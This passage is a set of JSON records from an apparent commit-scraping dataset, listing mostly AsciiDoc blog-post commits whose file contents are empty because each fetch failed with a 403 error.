2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"c6da6c50c0abe0b22d905f8cb49e50a11e09897d","subject":"Added the documentation template.","message":"Added the documentation template.\n","repos":"kurron\/lazybones-experiment,kurron\/lazybones-experiment,kurron\/lazybones-experiment,kurron\/lazybones-experiment","old_file":"templates\/jvm-guy-spring-boot-project\/src\/docs\/asciidoc\/api-guide.asciidoc","new_file":"templates\/jvm-guy-spring-boot-project\/src\/docs\/asciidoc\/api-guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kurron\/lazybones-experiment.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e13c12cc5bcbc229887a11acd35b8d00d1f48ec4","subject":"y2b create post Samsung Galaxy S4 Hands-on \\u0026 Overview (Galaxy S IV)","message":"y2b create post Samsung Galaxy S4 Hands-on \\u0026 Overview (Galaxy S IV)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-14-Samsung-Galaxy-S4-Handson-u0026-Overview-Galaxy-S-IV.adoc","new_file":"_posts\/2013-03-14-Samsung-Galaxy-S4-Handson-u0026-Overview-Galaxy-S-IV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e8058bb206b14cf00f7e3088be409d82d8f8652","subject":"Update 2015-06-26-Hello-World.adoc","message":"Update 2015-06-26-Hello-World.adoc","repos":"gerdbremer\/gerdbremer.github.io,gerdbremer\/gerdbremer.github.io,gerdbremer\/gerdbremer.github.io","old_file":"_posts\/2015-06-26-Hello-World.adoc","new_file":"_posts\/2015-06-26-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gerdbremer\/gerdbremer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db2aec89e3554f356d41039f53e0a8f874116277","subject":"Update 2016-08-19-Hello-everybody.adoc","message":"Update 2016-08-19-Hello-everybody.adoc","repos":"mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io","old_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkorevec\/mkorevec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68eb789f644451a3e2e1e90edef12391dffdfb0f","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af385e1295d51c181aa42a1e5b3ec5cb330f10f2","subject":"Update 2017-05-23-Regular-Expression.adoc","message":"Update 
2017-05-23-Regular-Expression.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-23-Regular-Expression.adoc","new_file":"_posts\/2017-05-23-Regular-Expression.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f629eb9b96a3034c6cb1334961dcf788e51932d","subject":"Update 2017-07-02-Continuous-learnig.adoc","message":"Update 2017-07-02-Continuous-learnig.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2017-07-02-Continuous-learnig.adoc","new_file":"_posts\/2017-07-02-Continuous-learnig.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4aafbb01dd964f75c5649a6c3d64b66d7267d0d","subject":"Update getting-started.adoc","message":"Update getting-started.adoc","repos":"lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ddd212602891f6feabdd6c660a411de7233afd64","subject":"Publish 2016-09-innovation-engineer-aruaru.adoc","message":"Publish 2016-09-innovation-engineer-aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-09-innovation-engineer-aruaru.adoc","new_file":"2016-09-innovation-engineer-aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71d146b94027cf4d3f7b2260ce1f9f556b092f94","subject":"Docs: Removed NSFW link.","message":"Docs: Removed NSFW 
link.\n","repos":"gmarz\/elasticsearch,IanvsPoplicola\/elasticsearch,mmaracic\/elasticsearch,elasticdog\/elasticsearch,umeshdangat\/elasticsearch,ZTE-PaaS\/elasticsearch,tebriel\/elasticsearch,shreejay\/elasticsearch,jprante\/elasticsearch,girirajsharma\/elasticsearch,glefloch\/elasticsearch,strapdata\/elassandra,trangvh\/elasticsearch,scottsom\/elasticsearch,fernandozhu\/elasticsearch,wangtuo\/elasticsearch,nazarewk\/elasticsearch,elasticdog\/elasticsearch,nknize\/elasticsearch,markharwood\/elasticsearch,fforbeck\/elasticsearch,girirajsharma\/elasticsearch,jprante\/elasticsearch,Helen-Zhao\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,yynil\/elasticsearch,ricardocerq\/elasticsearch,brandonkearby\/elasticsearch,rlugojr\/elasticsearch,sreeramjayan\/elasticsearch,nomoa\/elasticsearch,markharwood\/elasticsearch,bawse\/elasticsearch,henakamaMSFT\/elasticsearch,JackyMai\/elasticsearch,a2lin\/elasticsearch,wenpos\/elasticsearch,mmaracic\/elasticsearch,bawse\/elasticsearch,coding0011\/elasticsearch,mjason3\/elasticsearch,mjason3\/elasticsearch,s1monw\/elasticsearch,gmarz\/elasticsearch,LeoYao\/elasticsearch,artnowo\/elasticsearch,kalimatas\/elasticsearch,ZTE-PaaS\/elasticsearch,njlawton\/elasticsearch,fred84\/elasticsearch,wangtuo\/elasticsearch,JackyMai\/elasticsearch,wenpos\/elasticsearch,ESamir\/elasticsearch,masaruh\/elasticsearch,mohit\/elasticsearch,maddin2016\/elasticsearch,scottsom\/elasticsearch,mmaracic\/elasticsearch,vroyer\/elasticassandra,dongjoon-hyun\/elasticsearch,LeoYao\/elasticsearch,mmaracic\/elasticsearch,ESamir\/elasticsearch,a2lin\/elasticsearch,henakamaMSFT\/elasticsearch,bawse\/elasticsearch,scorpionvicky\/elasticsearch,mohit\/elasticsearch,jprante\/elasticsearch,GlenRSmith\/elasticsearch,njlawton\/elasticsearch,MaineC\/elasticsearch,episerver\/elasticsearch,palecur\/elasticsearch,episerver\/elasticsearch,njlawton\/elasticsearch,JervyShi\/elasticsearch,JSCooke\/elasticsearch,camilojd\/elasticsearch,markwalkom\/elasticsearch,robin13\/elasticsearch,wuranbo\/elasticsearch,cwurm\/elasticsearch,ZTE-PaaS\/elasticsearch,nezirus\/elasticsearch,dpursehouse\/elasticsearch,vroyer\/elassandra,i-am-Nathan\/elasticsearch,umeshdangat\/elasticsearch,LewayneNaidoo\/elasticsearch,MaineC\/elasticsearch,LewayneNaidoo\/elasticsearch,a2lin\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,qwerty4030\/elasticsearch,clintongormley\/elasticsearch,shreejay\/elasticsearch,MisterAndersen\/elasticsearch,nilabhsagar\/elasticsearch,nazarewk\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,awislowski\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,mikemccand\/elasticsearch,cwurm\/elasticsearch,jimczi\/elasticsearch,uschindler\/elasticsearch,StefanGor\/elasticsearch,StefanGor\/elasticsearch,rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,C-Bish\/elasticsearch,spiegela\/elasticsearch,geidies\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,cwurm\/elasticsearch,C-Bish\/elasticsearch,JSCooke\/elasticsearch,qwerty4030\/elasticsearch,spiegela\/elasticsearch,diendt\/elasticsearch,rlugojr\/elasticsearch,a2lin\/elasticsearch,davidvgalbraith\/elasticsearch,xuzha\/elasticsearch,MisterAndersen\/elasticsearch,wuranbo\/elasticsearch,jprante\/elasticsearch,i-am-Nathan\/elasticsearch,MisterAndersen\/elasticsearch,ESamir\/elasticsearch,scorpionvicky\/elasticsearch,palecur\/elasticsearch,markharwood\/elasticsearch,rajanm\/elasticsearch,sreeramjayan\/elasticsearch,nazarewk\/elasticsearch
,fernandozhu\/elasticsearch,ricardocerq\/elasticsearch,ZTE-PaaS\/elasticsearch,rlugojr\/elasticsearch,winstonewert\/elasticsearch,winstonewert\/elasticsearch,qwerty4030\/elasticsearch,zkidkid\/elasticsearch,girirajsharma\/elasticsearch,Shepard1212\/elasticsearch,fforbeck\/elasticsearch,scorpionvicky\/elasticsearch,spiegela\/elasticsearch,gmarz\/elasticsearch,StefanGor\/elasticsearch,IanvsPoplicola\/elasticsearch,i-am-Nathan\/elasticsearch,lks21c\/elasticsearch,sneivandt\/elasticsearch,masaruh\/elasticsearch,markharwood\/elasticsearch,IanvsPoplicola\/elasticsearch,nezirus\/elasticsearch,palecur\/elasticsearch,uschindler\/elasticsearch,LeoYao\/elasticsearch,wuranbo\/elasticsearch,maddin2016\/elasticsearch,avikurapati\/elasticsearch,nazarewk\/elasticsearch,yanjunh\/elasticsearch,JSCooke\/elasticsearch,sneivandt\/elasticsearch,JervyShi\/elasticsearch,lks21c\/elasticsearch,jimczi\/elasticsearch,lks21c\/elasticsearch,Shepard1212\/elasticsearch,pozhidaevak\/elasticsearch,henakamaMSFT\/elasticsearch,henakamaMSFT\/elasticsearch,strapdata\/elassandra5-rc,liweinan0423\/elasticsearch,dongjoon-hyun\/elasticsearch,nknize\/elasticsearch,lks21c\/elasticsearch,i-am-Nathan\/elasticsearch,palecur\/elasticsearch,diendt\/elasticsearch,diendt\/elasticsearch,uschindler\/elasticsearch,mohit\/elasticsearch,GlenRSmith\/elasticsearch,jchampion\/elasticsearch,mapr\/elasticsearch,myelin\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,artnowo\/elasticsearch,ZTE-PaaS\/elasticsearch,GlenRSmith\/elasticsearch,awislowski\/elasticsearch,mortonsykes\/elasticsearch,MaineC\/elasticsearch,JervyShi\/elasticsearch,gmarz\/elasticsearch,coding0011\/elasticsearch,wenpos\/elasticsearch,camilojd\/elasticsearch,yanjunh\/elasticsearch,dpursehouse\/elasticsearch,masaruh\/elasticsearch,ricardocerq\/elasticsearch,alexshadow007\/elasticsearch,dongjoon-hyun\/elasticsearch,Stacey-Gammon\/elasticsearch,diendt\/elasticsearch,yanjunh\/elasticsearch,artnowo\/elasticsearch,JervyShi\/elasticsearch,yanjunh\/elasticsearch,markharwood\/elasticsearch,mmaracic\/elasticsearch,dpursehouse\/elasticsearch,ricardocerq\/elasticsearch,alexshadow007\/elasticsearch,clintongormley\/elasticsearch,obourgain\/elasticsearch,myelin\/elasticsearch,nezirus\/elasticsearch,episerver\/elasticsearch,dongjoon-hyun\/elasticsearch,girirajsharma\/elasticsearch,Shepard1212\/elasticsearch,girirajsharma\/elasticsearch,liweinan0423\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,nknize\/elasticsearch,mapr\/elasticsearch,cwurm\/elasticsearch,winstonewert\/elasticsearch,obourgain\/elasticsearch,yynil\/elasticsearch,LewayneNaidoo\/elasticsearch,Helen-Zhao\/elasticsearch,xuzha\/elasticsearch,fernandozhu\/elasticsearch,LeoYao\/elasticsearch,JervyShi\/elasticsearch,jchampion\/elasticsearch,a2lin\/elasticsearch,LeoYao\/elasticsearch,palecur\/elasticsearch,nknize\/elasticsearch,MisterAndersen\/elasticsearch,rajanm\/elasticsearch,ESamir\/elasticsearch,jbertouch\/elasticsearch,markwalkom\/elasticsearch,mikemccand\/elasticsearch,jbertouch\/elasticsearch,fforbeck\/elasticsearch,bawse\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra5-rc,i-am-Nathan\/elasticsearch,geidies\/elasticsearch,clintongormley\/elasticsearch,wenpos\/elasticsearch,diendt\/elasticsearch,strapdata\/elassandra,trangvh\/elasticsearch,myelin\/elasticsearch,umeshdangat\/elasticsearch,uschindler\/elasticsearch,obourgain\/elasticsearch,xuzha\/elasticsearch,sreeramjayan\/elasticsearch,JSCooke\/elasticsearch,nomoa\/elasticsearch,myelin\/elasticsearch,camilojd\/elasticsearch,mortonsykes\/elasticsea
rch,elasticdog\/elasticsearch,mjason3\/elasticsearch,IanvsPoplicola\/elasticsearch,jchampion\/elasticsearch,davidvgalbraith\/elasticsearch,JSCooke\/elasticsearch,fernandozhu\/elasticsearch,awislowski\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,mapr\/elasticsearch,sreeramjayan\/elasticsearch,mikemccand\/elasticsearch,fernandozhu\/elasticsearch,maddin2016\/elasticsearch,alexshadow007\/elasticsearch,avikurapati\/elasticsearch,tebriel\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra5-rc,trangvh\/elasticsearch,IanvsPoplicola\/elasticsearch,yynil\/elasticsearch,mmaracic\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,brandonkearby\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,mapr\/elasticsearch,yanjunh\/elasticsearch,mortonsykes\/elasticsearch,geidies\/elasticsearch,davidvgalbraith\/elasticsearch,LewayneNaidoo\/elasticsearch,qwerty4030\/elasticsearch,Helen-Zhao\/elasticsearch,mortonsykes\/elasticsearch,davidvgalbraith\/elasticsearch,mapr\/elasticsearch,MaineC\/elasticsearch,gingerwizard\/elasticsearch,geidies\/elasticsearch,trangvh\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,mohit\/elasticsearch,jchampion\/elasticsearch,episerver\/elasticsearch,trangvh\/elasticsearch,Stacey-Gammon\/elasticsearch,myelin\/elasticsearch,brandonkearby\/elasticsearch,strapdata\/elassandra5-rc,jbertouch\/elasticsearch,davidvgalbraith\/elasticsearch,JackyMai\/elasticsearch,JervyShi\/elasticsearch,davidvgalbraith\/elasticsearch,mikemccand\/elasticsearch,jimczi\/elasticsearch,camilojd\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra5-rc,xuzha\/elasticsearch,spiegela\/elasticsearch,dpursehouse\/elasticsearch,vroyer\/elasticassandra,obourgain\/elasticsearch,pozhidaevak\/elasticsearch,liweinan0423\/elasticsearch,nilabhsagar\/elasticsearch,jchampion\/elasticsearch,avikurapati\/elasticsearch,xuzha\/elasticsearch,pozhidaevak\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,sneivandt\/elasticsearch,nomoa\/elasticsearch,jbertouch\/elasticsearch,qwerty4030\/elasticsearch,sreeramjayan\/elasticsearch,fforbeck\/elasticsearch,geidies\/elasticsearch,liweinan0423\/elasticsearch,avikurapati\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,C-Bish\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,markwalkom\/elasticsearch,MaineC\/elasticsearch,markwalkom\/elasticsearch,nazarewk\/elasticsearch,rlugojr\/elasticsearch,zkidkid\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,scottsom\/elasticsearch,coding0011\/elasticsearch,ESamir\/elasticsearch,liweinan0423\/elasticsearch,yynil\/elasticsearch,nomoa\/elasticsearch,spiegela\/elasticsearch,Stacey-Gammon\/elasticsearch,winstonewert\/elasticsearch,geidies\/elasticsearch,naveenhooda2000\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,pozhidaevak\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,dpursehouse\/elasticsearch,artnowo\/elasticsearch,vroyer\/elasticassandra,alexshadow007\/elasticsearch,fred84\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,wangtuo\/elasticsearch,nomoa\/elasticsearch,elasticdog\/elasticsearch,JackyMai\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,rlugojr\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,Shepard1212\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elastic
search,Helen-Zhao\/elasticsearch,yynil\/elasticsearch,markharwood\/elasticsearch,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,camilojd\/elasticsearch,masaruh\/elasticsearch,gfyoung\/elasticsearch,nilabhsagar\/elasticsearch,vroyer\/elassandra,jbertouch\/elasticsearch,strapdata\/elassandra,ESamir\/elasticsearch,robin13\/elasticsearch,Shepard1212\/elasticsearch,MisterAndersen\/elasticsearch,shreejay\/elasticsearch,StefanGor\/elasticsearch,clintongormley\/elasticsearch,cwurm\/elasticsearch,artnowo\/elasticsearch,episerver\/elasticsearch,scottsom\/elasticsearch,fred84\/elasticsearch,gmarz\/elasticsearch,wangtuo\/elasticsearch,njlawton\/elasticsearch,umeshdangat\/elasticsearch,nknize\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,brandonkearby\/elasticsearch,tebriel\/elasticsearch,henakamaMSFT\/elasticsearch,umeshdangat\/elasticsearch,HonzaKral\/elasticsearch,zkidkid\/elasticsearch,jprante\/elasticsearch,nilabhsagar\/elasticsearch,mapr\/elasticsearch,winstonewert\/elasticsearch,HonzaKral\/elasticsearch,xuzha\/elasticsearch,wuranbo\/elasticsearch,ricardocerq\/elasticsearch,awislowski\/elasticsearch,nezirus\/elasticsearch,LeoYao\/elasticsearch,zkidkid\/elasticsearch,C-Bish\/elasticsearch,nezirus\/elasticsearch,brandonkearby\/elasticsearch,LewayneNaidoo\/elasticsearch,dongjoon-hyun\/elasticsearch,glefloch\/elasticsearch,nilabhsagar\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,naveenhooda2000\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,clintongormley\/elasticsearch,C-Bish\/elasticsearch,fred84\/elasticsearch,diendt\/elasticsearch,wuranbo\/elasticsearch,markwalkom\/elasticsearch,jbertouch\/elasticsearch,zkidkid\/elasticsearch,glefloch\/elasticsearch,awislowski\/elasticsearch,camilojd\/elasticsearch,GlenRSmith\/elasticsearch,mohit\/elasticsearch,JackyMai\/elasticsearch,yynil\/elasticsearch,StefanGor\/elasticsearch,tebriel\/elasticsearch,mortonsykes\/elasticsearch,jchampion\/elasticsearch,fforbeck\/elasticsearch,robin13\/elasticsearch,njlawton\/elasticsearch,lks21c\/elasticsearch,tebriel\/elasticsearch,Helen-Zhao\/elasticsearch,bawse\/elasticsearch,mjason3\/elasticsearch,mikemccand\/elasticsearch,girirajsharma\/elasticsearch,sreeramjayan\/elasticsearch,avikurapati\/elasticsearch,obourgain\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,vroyer\/elassandra,elasticdog\/elasticsearch,tebriel\/elasticsearch,glefloch\/elasticsearch,clintongormley\/elasticsearch","old_file":"docs\/plugins\/repository.asciidoc","new_file":"docs\/plugins\/repository.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe5e30c04eb7360ce562c62632c25836fa527841","subject":"y2b create post Sony MDR-XB500 Unboxing \\u0026 Overview","message":"y2b create post Sony MDR-XB500 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-21-Sony-MDRXB500-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-08-21-Sony-MDRXB500-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"783cf39b4355ae63e24f57c7a2ee84871cbee40c","subject":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","message":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c31fa81a8604564d4afd2612261738600d1d8a4","subject":"Update 2015-07-09-Markdown-test.adoc","message":"Update 2015-07-09-Markdown-test.adoc","repos":"freekrai\/hubpress,freekrai\/hubpress,freekrai\/hubpress","old_file":"_posts\/2015-07-09-Markdown-test.adoc","new_file":"_posts\/2015-07-09-Markdown-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/freekrai\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8930ee94df8adb08efb93cd4f6a6f69fcdf22d56","subject":"Update 2017-03-12-My-English-Title.adoc","message":"Update 2017-03-12-My-English-Title.adoc","repos":"deformat\/deformat.github.io,deformat\/deformat.github.io,deformat\/deformat.github.io,deformat\/deformat.github.io","old_file":"_posts\/2017-03-12-My-English-Title.adoc","new_file":"_posts\/2017-03-12-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deformat\/deformat.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f736f82030203c3da73994186abd0c3e5860638","subject":"Update 2018-07-13-I-will-be-Vimmer.adoc","message":"Update 2018-07-13-I-will-be-Vimmer.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-13-I-will-be-Vimmer.adoc","new_file":"_posts\/2018-07-13-I-will-be-Vimmer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efe8be547a147d0bddeddc3de4b65ed0c694fb23","subject":"Update 2015-05-17-Leonardo-da-Gerti.adoc","message":"Update 2015-05-17-Leonardo-da-Gerti.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"644c36cd746673101bbbe11daf28f0a7c1aac8d3","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 
2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ab3b538db2eceaddcc8079a1a4ab3e58460b201","subject":"Update 2018-06-24-Laravel56-Request.adoc","message":"Update 2018-06-24-Laravel56-Request.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-Laravel56-Request.adoc","new_file":"_posts\/2018-06-24-Laravel56-Request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61fe8dbcb43c6533ea9b7eb0f39b6e62dc7ff278","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"840656d1dfba0c0565fc9628c59fe3a98b6c2617","subject":"Update 2019-03-21-consider-database.adoc","message":"Update 2019-03-21-consider-database.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-21-consider-database.adoc","new_file":"_posts\/2019-03-21-consider-database.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0fc5e4b548a840918f214fd66bf2f8686519221","subject":"Update index.adoc","message":"Update index.adoc","repos":"HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io","old_file":"_posts\/index.adoc","new_file":"_posts\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd1c60efb2e65ef2bffc61f2548aa652001141ff","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 